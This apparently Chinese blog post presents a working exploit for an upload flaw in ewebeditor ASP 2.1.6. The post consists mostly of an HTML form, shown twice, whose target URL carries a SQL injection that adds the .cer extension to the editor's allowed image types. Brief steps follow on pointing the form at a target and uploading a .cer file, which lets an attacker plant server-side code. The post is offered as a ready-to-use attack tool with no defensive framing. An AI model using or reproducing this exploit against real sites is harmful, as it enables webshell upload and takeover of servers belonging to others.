本文介绍了一种利用ewebeditor ASP版2.1.6中存在的上传漏洞的方法,通过构造特定的HTTP请求,可以绕过限制上传CER文件。此漏洞允许攻击者上传恶意文件,可能导致服务器被控制。
<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件.
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
